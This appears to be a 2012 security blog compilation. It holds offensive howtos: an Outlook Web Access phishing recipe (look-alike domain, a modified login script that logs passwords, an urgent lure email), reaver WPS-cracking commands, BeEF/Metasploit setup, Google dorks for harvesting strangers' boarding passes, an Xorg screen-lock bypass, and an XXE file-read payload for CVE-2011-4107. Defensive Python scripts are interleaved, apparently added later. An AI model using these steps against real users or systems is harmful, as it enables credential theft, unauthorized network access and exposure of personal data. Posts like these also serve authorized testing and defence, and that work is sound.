Jan 20, 2012

Howto: Simple Outlook Web Access Phishing

This blog post describes a simple phishing attack covered in today's webcast. The goal is to create a fake front-end to an organization's Outlook Web Access portal and convince users to log in through this portal. In the course of an authorized security assessment, this type of attack provides an initial foot in the door to the target organization and takes few resources to set up.
This technique relies on the following steps:
  • Clone the target's existing OWA site to match graphics and versions
    • HTTrack or Firefox "Save page as"
  • Register a look-alike domain (mail.example.com -> mailexample.com)
    • Gandi.net even provides free SSL certificates as part of COM registration
    • IDN-style names can make this even harder to identify
  • Rewrite the OWA HTML to change the links/images
    • Point the form POST to the real OWA portal
  • Modify flogon.js to log prior to re-posting to the real OWA
The result is a site that looks like the original and acts like the original. A bad password takes the user to the real site with the expected error and a correct password takes them to the real site and logs them in. Microsoft could mitigate this by adding CSRF tokens to the form authentication template in OWA. This basic technique was used with both Exchange 2007 and Exchange 2010 OWA installations.
To convince users to access the mis-named site, I typically craft an email with a subject like "Welcome to Outlook Web Access", pasting in a typical "enrollment" email and linking to the fake portal (with the displayed link pointing to the real portal). Telling the user that they have 24 hours to access the portal to keep their account active may help speed things along as well.
If you conduct this type of phishing attack for another organization, the friendly thing to do is transfer the domain to their IT staff after the conclusion of the test. At the least, it takes a potential phishing domain off a list that a real attacker could draw from.
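The look-alike domain step above is also where a defender can catch this. The script below is an added example, not part of the original post: it takes the organisation's genuine portal host (assumed here to be mail.example.com) and a constructed list of host names seen in proxy or DNS logs, and flags dot-dropped variants, punycode (IDN) names and typo-squats within a couple of edits.

```python
import unicodedata

# Assumption: the organisation's genuine OWA host (not taken from the post).
REAL_HOST = "mail.example.com"

# Constructed sample of host names seen in proxy or DNS logs, not real data.
OBSERVED_HOSTS = [
    "mail.example.com",
    "mailexample.com",
    "mai1.example.com",
    "mailexämple.com".encode("idna").decode("ascii"),   # punycode form (xn--...)
    "outlook.com",
]


def normalize(host):
    """Lower-case, decode punycode labels and strip accents so 'exämple' compares as 'example'."""
    host = host.strip().lower().rstrip(".")
    if "xn--" in host:
        host = host.encode("ascii").decode("idna")
    decomposed = unicodedata.normalize("NFKD", host)
    return "".join(ch for ch in decomposed if not unicodedata.combining(ch))


def edit_distance(a, b):
    """Levenshtein distance by the standard dynamic-programming recurrence."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(candidate, real_host=REAL_HOST, max_distance=2):
    """Return why candidate resembles real_host ([] when it does not)."""
    real, cand = normalize(real_host), normalize(candidate)
    # The genuine host, its subdomains and its parent domains are not look-alikes.
    if cand == real or cand.endswith("." + real) or real.endswith("." + cand):
        return []
    reasons = []
    if cand.replace(".", "") == real.replace(".", ""):
        reasons.append("dot-dropped")          # mail.example.com -> mailexample.com
    if edit_distance(cand, real) <= max_distance:
        reasons.append("near-match")           # typo-squat within a couple of edits
    if reasons and "xn--" in candidate.lower():
        reasons.insert(0, "idn")               # and it is an internationalised name on top
    return reasons


def scan(hosts, real_host=REAL_HOST):
    """Map each suspicious host to its reasons; hosts that pass are left out."""
    verdicts = {h: classify(h, real_host) for h in hosts}
    return {h: why for h, why in verdicts.items() if why}


if __name__ == "__main__":
    for host, why in scan(OBSERVED_HOSTS).items():
        print(f"{host:36s} {', '.join(why)}")
```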

If you like my blog, Please Donate Me

Bypass screensaver/locker program on xorg 1.11 and up

It was quite a surprise for me when I found this post. If you want to see the full message, please go to the Source.

Hi, I recently stumbled upon a funny bug/feature in the Xorg server that could allow attackers with physical access to a machine to bypass the screensaver/screen locker program. Most people use those programs to lock their computer when they are away. On Gnome, gnome-screensaver is responsible for this. On KDE, kscreenlocker is. There is a wide variety of smaller tools doing the same thing, e.g. slock, slimlock, i3lock...
A few years ago, a special keybinding was introduced to "kill" windows that grabbed the mouse/keyboard (mostly for testing/debug purposes?). This functionality was disabled by default, well documented in the man page, and an API was written for programs to disallow this behavior:
Option "AllowClosedownGrabs" "boolean"
    This option enables the use of the Ctrl+Alt+Keypad-Multiply key sequence to kill clients with an active keyboard or mouse grab as well as killing any application that may have locked the server, normally using the XGrabServer(3x) Xlib function. Default: off.
    Note that the options AllowDeactivateGrabs and AllowClosedownGrabs will allow users to remove the grab used by screen saver/locker programs. An API was written to such cases. If you enable this option, make sure your screen saver/locker is updated.

This API allowing the keybinding to be disabled per application was removed in 2008 with the XFree86-Misc extension (commit here and here). Later, the whole AllowClosedownGrabs code was removed (commit) and all references to it were expunged from the man page (commit). I never knew about those key bindings and I doubt they were widely used anyway.

The functionality seems to have been reintroduced in 2011 (commit here and mailing list message here), but this time it's enabled by default, not clearly documented and not even easily configurable (or maybe I haven't found the right way to do it?). All distros shipping xorg 1.11 (e.g. Arch Linux, Debian Wheezy) are vulnerable to this. I can reproduce the bug on Debian (Gnome 3), Arch Linux with Gnome 3, slock and slimlock. KDE is also vulnerable according to a friend.
Quick and dirty fix? Edit your xkb configuration manually to remove all mentions of XF86Ungrab and XF86ClearGrab. You could also use vlock.

Source: http://gu1.aeroxteam.fr/2012/01/19/bypass-screensaver-locker-program-xorg-111-and-up/


Jan 19, 2012

Howto: Crack WPS & WPA Wifi with reaver

1. Get reaver
- wget https://reaver-wps.googlecode.com/files/reaver-1.3.tar.gz

2. Extract and compile it.
- tar xzvf reaver-1.3.tar.gz
- cd reaver-1.3/src
- ./configure
- make
- make install

3. Change your wireless card to monitor mode
- airmon-ng start wlan0

4. Use reaver
- reaver -i mon0 -b <mac_address_wireless_access_point>

5. Wait for beacons from the wireless access point, and finally you will find the key!!!



Howto: Use BeEF with Metasploit 4.2.0-dev

In the last month, Metasploit has replaced xmlrpc with msgrpc, and BeEF has updated its library to communicate with Metasploit. This post is a tutorial on using BeEF with Metasploit v4.2.0.

** My OS is Backtrack 5 R1, Metasploit v4.2.0dev, beef-

1. Install the latest BeEF with
   - rm -rf /pentest/web/beef
   - git clone https://github.com/beefproject/be
   - Add export GEM_PATH=/var/lib/gems/1.9.2/gems && export GEM_HOME=/var/lib/gems/1.9.2/gems to /etc/profile
   - source /etc/profile
   - cd /pentest/web/beef
   - gem install bundler
   - bundle install
   - Verify the gem path in irb:
     root@bt:~# irb
     irb(main):001:0> require 'rubygems'
     => false
     irb(main):002:0> require 'dm-core'
     => true
     irb(main):003:0> Gem.path
     => ["/var/lib/gems/1.9.2/gems"]
     irb(main):004:0> quit

2. Edit /pentest/web/beef/config.yaml, at the end of the file

3. Edit /pentest/web/beef/extensions/metasploit/config.yaml, setting host and callback_host to your IP.

4. Create BeEF.rc to load the msgrpc plugin and its configuration with
## In the BeEF.rc
load msgrpc ServerHost=yourIP Pass=abc123 ServerType=Web

5. Load Metasploit with "-r BeEF.rc"
- msfconsole -r BeEF.rc

6. Load BeEF
- /pentest/web/beef/beef


Jan 18, 2012

Howto: Banner Grabbing

If you want the full details, please go to the Source.

If you just type nmap on the console you will get a pretty detailed help with all the switches nmap can run. Let's first start with an ICMP Echo scan (-PE); we are adding -sn, which disables port scanning for now.

ICMP Echo Scans
So we scan our network and discover ourselves and another host. We have to be wary of ICMP scans, as ICMP is generally quite restricted on networks, especially when scanning from outside the network. Let's see if we can do a TCP port scan to see what TCP ports are open on our potential victim. Let's go with the TCP SYN scan (-sS).


So now we should figure out what versions those services are running, if we can. This way we can research and determine if they are running exploitable versions. So before I show you a way with nmap, I am going to quickly go to an old friend of mine, netcat. Netcat is a great tool which I highly recommend having in your arsenal: it can be used to scan for hosts, set up connections (valid and not so valid) between two machines, allows a remote shell to be shoveled to you from your victim, and even grabs banners for you :) If you want to do all this over an encrypted connection, well, there is cryptcat.

Ok, so let's do a banner grab for port 25, the SMTP mail service.


So the command is quite easy here... the '-v' stands for verbose (I am being EXTRA verbose, using double v's). Then I enter the IP and the port I am querying. As you can see, we found a Microsoft ESMTP MAIL service, Version 6.0.2600.5512, which according to Wikipedia is Exchange 2000. A quick Google search takes me to a Securiteam webpage showing the exploits in Version 6 of ESMTP.

Lets see what wireshark says:

Wireshark Output of Netcat Banner Grab

So we see our three-way handshake being established and then our potential victim responding with an SMTP packet and what version it is running. You can actually set this up so the version is not displayed, giving you a little buffer of protection from script kiddies. I should also point out that not every port will respond with things like this when you establish a connection; it is only certain protocols and software.

NetCat - Port 80
As you can see, we have a prompt waiting for input, so we type in 'GET HTTP', which should get us the information we are looking for.

NetCat - Querying Port 80

So this gives us our web server, IIS 5.1. Again, a quick Google search reveals a few candidates we could try against this web server. This is looking promising!

Ok, now onto something a tad more automated: nmap again has a switch for service detection (-sV). Let's run that on our host and see what it returns:

Nmap -sV parameter
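To turn the banner grabs above into an audit of what your own servers disclose, here is an added example that is not from the post: it parses SMTP 220 greetings and HTTP Server headers for product and version, and reports every service that leaks one. The sample banners are constructed to match what the post reports (Microsoft ESMTP 6.0.2600.5512, IIS 5.1); the host names are placeholders.

```python
import re
import socket

# Constructed sample banners, modelled on what the post reports (not captured traffic);
# host names are placeholders.
SAMPLE_SMTP = ("220 mail.example.test Microsoft ESMTP MAIL Service, Version: 6.0.2600.5512 "
               "ready at  Thu, 19 Jan 2012 10:00:00 -0500 \r\n")
SAMPLE_HTTP = ("HTTP/1.1 400 Bad Request\r\nServer: Microsoft-IIS/5.1\r\n"
               "Date: Thu, 19 Jan 2012 15:00:00 GMT\r\nContent-Type: text/html\r\n\r\n")
SAMPLE_HTTP_QUIET = "HTTP/1.1 200 OK\r\nDate: Thu, 19 Jan 2012 15:00:00 GMT\r\nContent-Length: 0\r\n\r\n"

VERSION_RE = re.compile(r"(\d+(?:\.\d+)+)")  # dotted version number such as 6.0.2600.5512


def grab(host, port, probe=b"", timeout=3.0):
    """netcat-style grab against your own host: connect, optionally send a probe, read the reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if probe:                          # e.g. b"GET / HTTP/1.0\r\n\r\n" for a web server
            s.sendall(probe)
        return s.recv(4096).decode("latin-1", "replace")


def parse_smtp_banner(banner):
    """Split an SMTP 220 greeting into host, product and version (version None if absent)."""
    m = re.match(r"220[ -](\S+)\s*(.*)", banner.strip())
    if not m:
        return None
    host, rest = m.groups()
    v = VERSION_RE.search(rest)
    product = rest[: v.start()] if v else rest
    product = re.sub(r"[,\s]*Version:?\s*$", "", product, flags=re.I).strip()
    return {"host": host, "product": product, "version": v.group(1) if v else None}


def parse_http_response(raw):
    """Return product/version from the Server header, or None when the server sends none."""
    head = raw.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:    # skip the status line
        name, _, value = line.partition(":")
        if name.strip().lower() == "server":
            product, _, version = value.strip().partition("/")
            return {"product": product, "version": version or None}
    return None


def audit(records):
    """records: (host, port, raw_banner) tuples. Report every service that discloses a version."""
    findings = []
    for host, port, raw in records:
        info = parse_smtp_banner(raw) if port == 25 else parse_http_response(raw)
        if info and info["version"]:
            findings.append({"host": host, "port": port,
                             "product": info["product"], "version": info["version"]})
    return findings


if __name__ == "__main__":
    sample = [("mail.example.test", 25, SAMPLE_SMTP),
              ("www.example.test", 80, SAMPLE_HTTP),
              ("quiet.example.test", 80, SAMPLE_HTTP_QUIET)]
    for f in audit(sample):
        print(f"{f['host']}:{f['port']} discloses {f['product']} {f['version']}")
```

For a live check of your own hosts, feed grab(host, 25) or grab(host, 80, b"GET / HTTP/1.0\r\n\r\n") into the same parsers.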

Source: http://sketchymoose.blogspot.com/2012/01/banner-grabbing-whats-running.html


Howto: Harvesting Boarding Pass with Google Dork

If you want the details of the boarding passes, please go to the Source.


"BOARDING PASS" "Please keep this document until the end of your trip" filetype:pdf

intitle:"Internet Check-In" filetype:pdf


(name OR nome) "etix" "Boarding Pass" filetype:pdf

boarding pass etix intitle:lufthansa intitle:pdf filetype:pdf

"easyJet.com Internet check-in boarding pass" filetype:pdf


Source: http://andreicostin.com/index.php/brain/2011/11/02/harvesting_boarding_passes


Jan 16, 2012

Scanning Redux: TCP and UDP

So we wrap up the blog postings on scanning with TCP and UDP scans. Now again I stress that there are other types of scans out there, I just want to highlight some of them.

TCP stands for Transfer Control Protocol. This is the powerhouse of protocols; many applications ride this bad boy straight to your computer. Example-- this web page! Your email clients and file transfer programs also use TCP. Why? Because TCP is reliable: it sets up a connection between two hosts, making sure both know what is going on (who is sending? who is receiving? did you receive that? Hey, I received the packet, keep sending.. Oh fizzle sticks, I never received this one packet, please resend! K, thx bai!)

How does TCP do this? Well, with the ever classic 3-way handshake. You can definitely check out the Wiki page for the official description. I liken the 3-way handshake to the best relationship ever: before speaking to his/her mate, the one partner will get the other's attention (SYN), the other will then look at him/her to confirm they heard them (SYN-ACK), and then once he/she has their attention, will start to speak (ACK).

I am going to assume people understand TCP enough to go through the scanning options; if not, check out the documentation out there on the interwebs. I will post the TCP packet header from the SANS Cheat Sheet I talked about last post. You can grab the whole cheat sheet here.

TCP Header

The Flag Byte of the TCP Header
TCP Syn Scan: This is when you start the 3-way handshake described earlier, except you never get past the 2nd step. Nmap here shows the scanning machine sending a RST, cancelling the connection setup (else the port could be sitting there for a while waiting for the ACK... what a waste!)

TCP Syn Scan - responded with a SYN-ACK, we have an open port!
Let's take a closer look at the flag bit...

Flag Bits of a TCP SYN Packet

So for those who count in binary we see this byte is 00000010, which is decimal 2. Cool, so when that bit is 'flipped' (or switched to '1') what does that mean? Looking at the SANS cheat sheet, we see that the 'SYN' bit is set to the 2nd bit... or 00000010. Wait, that's what it says! It must mean the SYN flag is on! Hoorah!

So riddle me this, Mr./Miss Smarty Pants: what would a SYN-ACK flag bit be set to? Well, let's go back to the sheet; it says the ACK flag is set on the 5th bit. So if we flipped both SYN and ACK on, it would be 00010010, which is what in decimal? Whip out those calculators or pencils! The answer is 18 in decimal, ah, but we are in hex mode here, which is the power of 16! Whaa, this is getting complicated! Go here for an example. Ok so dividing by 16 ::hours pass:: so that gets us the hex value of 0x12! And just to prove it, here is the flag byte of a SYN-ACK packet.

Flag Bits of a TCP SYN-ACK  packet

TCP Connect Scan: This is exactly what it sounds like: the full 3-way handshake is done to determine open ports. This scan is slower than the TCP Syn scan (this makes sense; sometimes you have to wait ages to get your partner to listen and then start to speak!), and now that you have a full connection, it has a better chance of being logged somewhere on the victim network. Not good if you are going for stealth. However, if you are being hampered by firewalls, this could be the way to go, as many devices could be between you and your intended victim, hampering your results.

TCP Christmas Scan: Sounds festive, right? This scan flips the FIN, PUSH, and URG flags ("lighting up like a Christmas tree"). This is effective against Linux hosts but not Windows machines (remember how I said different OSes respond to packets differently?). This is going off RFC 793, Page 65:
if the [destination] port state is CLOSED .... an incoming segment not containing a RST causes a RST to be sent in response.
So these are a bit sneaky and can evade some firewalls and routers, but like I said, with Linux boxes only. Microsoft by default responds to these types of packets with a 'RST ACK' regardless of whether it's open or not. This is seen below, using the two hosts we used in the above example.

It was open on the other scan.... Bah humbug!
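The flag-byte arithmetic above (SYN = 0x02, SYN-ACK = 0x12, Xmas = FIN+PSH+URG) is worth seeing in code. This is an added example, not from the post: it packs and unpacks a 20-byte TCP header in the standard layout, names the pattern each flag byte matches, and groups constructed probes by destination port the way a passive observer such as an IDS would.

```python
import struct

# Bits of the TCP flag byte, as on the SANS cheat sheet the post works from.
FLAGS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08,
         "ACK": 0x10, "URG": 0x20, "ECE": 0x40, "CWR": 0x80}

# 20-byte header: src port, dst port, seq, ack, data offset/reserved, flags, window, checksum, urgent ptr
TCP_HEADER = struct.Struct("!HHIIBBHHH")


def flags_to_byte(names):
    """Encode flag names into the flag byte: ("SYN", "ACK") -> 0x12, as worked out in the post."""
    byte = 0
    for name in names:
        byte |= FLAGS[name]
    return byte


def byte_to_flags(byte):
    """Decode a flag byte into names, lowest bit first: 0x12 -> ["SYN", "ACK"]."""
    return [name for name, bit in FLAGS.items() if byte & bit]


# Scan-related patterns the post describes, keyed by the flag byte they produce.
PATTERNS = {
    flags_to_byte(["SYN"]): "SYN probe (half-open scan or normal connect start)",
    flags_to_byte(["SYN", "ACK"]): "SYN-ACK (port open)",
    flags_to_byte(["FIN", "PSH", "URG"]): "Xmas probe (FIN+PSH+URG)",
}


def build_segment(src_port, dst_port, flags, seq=0, ack=0, window=65535):
    """Construct a minimal TCP header for testing (no options, checksum left zero)."""
    offset_byte = 5 << 4                      # data offset = 5 words, reserved bits clear
    return TCP_HEADER.pack(src_port, dst_port, seq, ack, offset_byte,
                           flags_to_byte(flags), window, 0, 0)


def parse_segment(raw):
    """Unpack the fixed header; an IDS or p0f-style observer would feed captured bytes here."""
    src, dst, seq, ack, offset, flag_byte, window, _csum, _urg = TCP_HEADER.unpack_from(raw)
    return {"src_port": src, "dst_port": dst, "seq": seq, "ack": ack, "window": window,
            "data_offset": offset >> 4, "flag_byte": flag_byte, "flags": byte_to_flags(flag_byte)}


def classify_probe(flag_byte):
    """Name the pattern a flag byte matches; RST wins because it signals a closed port or teardown."""
    f = flag_byte & 0x3F                      # ignore the ECN bits (ECE/CWR)
    if f & FLAGS["RST"]:
        return "RST (closed port or connection teardown)"
    return PATTERNS.get(f, "other")


def scan_summary(raw_segments):
    """Group headers by matched pattern and the destination ports touched, to spot a sweep."""
    summary = {}
    for raw in raw_segments:
        seg = parse_segment(raw)
        summary.setdefault(classify_probe(seg["flag_byte"]), set()).add(seg["dst_port"])
    return {pattern: sorted(ports) for pattern, ports in summary.items()}


if __name__ == "__main__":
    # Constructed traffic: one Xmas probe to each of three ports and one SYN-ACK reply.
    probes = [build_segment(5555, p, ["FIN", "PSH", "URG"]) for p in (22, 25, 80)]
    probes.append(build_segment(80, 5555, ["SYN", "ACK"], seq=1, ack=1))
    print(hex(flags_to_byte(["SYN", "ACK"])), scan_summary(probes))
```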

UDP is User Datagram Protocol. This is a connectionless protocol. It's like an assault on a port. There is no connection set up like TCP, and it doesn't care too much if some packets get dropped along the way. However, if you stream anything across the internets (like I am right now with internet radio), chances are pretty good you are using UDP. DNS also uses UDP for name resolution, and DHCP is over UDP as well. Because there is no error checking or connection set up, packets move faster and are sent to multiple hosts in a quicker fashion. Rock on UDP!

UDP Scan: So as we said before there are many services that use UDP, such as DNS (which is a pretty juicy target!) This scan shows UDP port 124  responding back to our scanner with an ICMP unreachable sign, indicating the port is closed.

Sorry, we are closed!

This is what my nmap output is for that scan, and it is what it should be, port 124 is closed:

nmap result from nmap -sU scan

As people posted in the comments, there are tons of tools out there you can use. Nmap is just one of many. The key is to find the one you like and trust. Nping, which someone mentioned earlier, allows for much more fine tuning of the packets that you send out. p0f does passive host identification. All the other scans I have shown are active-- we are interacting in some way with the intended target. p0f simply listens to network traffic and, based on the traffic it sees regarding the target, determines the OS, which is the stealthiest you can get, as you are simply observing (well, there is always a catch, still it's pretty slick). And like Jon said... a new version is coming out!

I did not talk about the multiple states that nmap can report back to the user, a good explanation is here on their website. Heck, I recommend the whole reference guide.

Next we get onto the fingerprinting/version detection... well, I may post my PowerShell script first. That will probably go on Pastebin. Like I said, it's nowhere near perfect and I am always looking for more ways to make scripting better, faster, and more kick ass (because let's face it... we are lazy and want something else to do the grunt work).

Source: http://sketchymoose.blogspot.com/2012/01/scanning-redux-tcp-and-udp.html


CVE-2011-4107 PoC - phpMyAdmin Local File Inclusion via XXE injection

An interesting local file inclusion vulnerability has recently been published: an XXE (XML eXternal Entity) injection attack which affects phpMyAdmin 3.4.x previous to and 3.3.x previous to (CVE-2011-4107).
The issue is located in the libraries\import\xml.php file, where the simplexml_load_string() function is called without checking whether the document references an external entity:
$xml = simplexml_load_string($buffer, "SimpleXMLElement", LIBXML_COMPACT);
Patched versions call the libxml_disable_entity_loader() PHP function before loading the XML document, in order to prevent the injection; libxml_disable_entity_loader() disables the ability to load external entities.
phpMyAdmin offers the functionality of importing a database from a user-specified XML file. In vulnerable versions, importing a specially crafted XML file which contains an external XML entity permits an authenticated attacker to retrieve a local file from the server or network (limited by the privileges of the user running the web server).
It is well understood that the LOAD_FILE MySQL function can be used to gain read access to files on the database server's file system; however, there are configurations where phpMyAdmin is installed on a different host than the database, and in those cases exploiting this issue can be handy in penetration testing engagements.
SECFORCE has developed a metasploit module to assist the exploitation of this vulnerability. It is available for download from our security tools section on our website.
This module automates the process of local file inclusion in the following way:
  1. Logging into phpMyAdmin using the provided credentials.
  2. Crafting an XML document using XXE with the given file to read.
  3. Uploading the XML.
  4. Retrieving the file from the server or network (restricted by the privileges of the user running the web server).
The module has the options shown in the following screenshot:

An example of a successful run of the module is presented in the screenshot below:
Example of a successful file read

Defining the XML external entity (XXE) injection attack as a form of XML injection vulnerability:
XML injection
XML Injection is when it is possible to change the values of an XML document and the XML parser fails to perform appropriate data validation, this way making the injection possible.
XML external entity injection attack (XXE)
“External Entity: The set of valid entities can be extended by defining new entities. If the definition of an entity is a URI, the entity is called an external entity. Unless configured to do otherwise, external entities force the XML parser to access the resource specified by the URI, e.g., a file on the local machine or on a remote systems. This behavior exposes the application to XML eXternal Entity (XXE) attacks, which can be used to perform denial of service of the local system, gain unauthorized access to files on the local machine, scan remote machines, and perform denial of service of remote systems.” - (OWASP-DV-008)

XXE Example:
 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
phpMyAdmin has released patched versions available for download from here.
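The PHP fix described above is to call libxml_disable_entity_loader() before parsing. The code below is an added example, not from the post or from phpMyAdmin, showing the same idea as an import-side pre-check in Python: reject any document whose DOCTYPE declares external entities or an external DTD before it reaches a parser. It uses the post's PoC document as the input that must be rejected; the benign export document is constructed.

```python
import re
import xml.etree.ElementTree as ET

# The PoC document from the post, used here as the input that must be rejected.
POC = ('<?xml version="1.0" encoding="ISO-8859-1"?>\n'
       '<!DOCTYPE foo [\n'
       '  <!ELEMENT foo ANY >\n'
       '  <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>')

# Constructed benign import with no DOCTYPE at all (not a real phpMyAdmin export).
BENIGN = '<?xml version="1.0"?><export><table name="users"/></export>'

# DOCTYPE with an optional internal subset [...]; the part before '[' may name an external DTD.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b(?P<head>[^\[>]*)(?:\[(?P<subset>.*?)\])?\s*>", re.S)
# <!ENTITY name SYSTEM "uri"> or <!ENTITY % name PUBLIC "id" "uri"> inside the subset.
ENTITY_RE = re.compile(r"""<!ENTITY\s+(?P<pe>%\s*)?(?P<name>\S+)\s+"""
                       r"""(?:SYSTEM\s+|PUBLIC\s+["'][^"']*["']\s+)["'](?P<uri>[^"']*)["']""")
EXT_DTD_RE = re.compile(r"""(?:SYSTEM|PUBLIC\s+["'][^"']*["'])\s+["'](?P<uri>[^"']*)["']""")


def external_references(xml_text):
    """List (kind, name, uri) for every external entity or external DTD the prolog declares."""
    found = []
    m = DOCTYPE_RE.search(xml_text)
    if not m:
        return found                      # no DOCTYPE, so no entity declarations at all
    head, subset = m.group("head") or "", m.group("subset") or ""
    ext = EXT_DTD_RE.search(head)
    if ext:
        found.append(("external-dtd", head.split()[0], ext.group("uri")))
    for e in ENTITY_RE.finditer(subset):
        kind = "parameter-entity" if e.group("pe") else "external-entity"
        found.append((kind, e.group("name"), e.group("uri")))
    return found


def safe_import(xml_text):
    """Refuse anything that would make the parser fetch a file or URL, then parse the rest."""
    refs = external_references(xml_text)
    if refs:
        raise ValueError(f"import rejected, external references declared: {refs}")
    return ET.fromstring(xml_text)


if __name__ == "__main__":
    print(external_references(POC))       # [('external-entity', 'xxe', 'file:///c:/boot.ini')]
    print(safe_import(BENIGN).tag)        # export
```

Internal entities (no SYSTEM or PUBLIC identifier) pass this check; entity-expansion denial of service is a separate concern this pre-check does not address.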

Source: http://www.secforce.com/blog/2012/01/cve-2011-4107-poc-phpmyadmin-local-file-inclusion-via-xxe-injection/
